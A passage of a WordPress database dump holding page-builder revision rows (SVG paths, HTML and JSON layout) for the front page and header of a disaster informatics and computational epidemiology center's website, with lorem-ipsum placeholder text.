d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:43:42','2022-02-16 15:43:42','',22,'https://gsudice.dataconn.net/?p=318',0,'revision','',0),(322,1,'2022-02-16 15:44:20','2022-02-16 15:44:20','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:44:20','2022-02-16 15:44:20','',168,'https://gsudice.dataconn.net/?p=322',0,'revision','',0),(323,1,'2022-02-16 15:44:20','2022-02-16 15:44:20','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c6\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c10\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c14\">\n <!---->\n <!---->\n <h5 class=\"\">population disparities</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:44:20','2022-02-16 15:44:20','',20,'https://gsudice.dataconn.net/?p=323',0,'revision','',0),(324,1,'2022-02-16 15:44:20','2022-02-16 15:44:20','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational 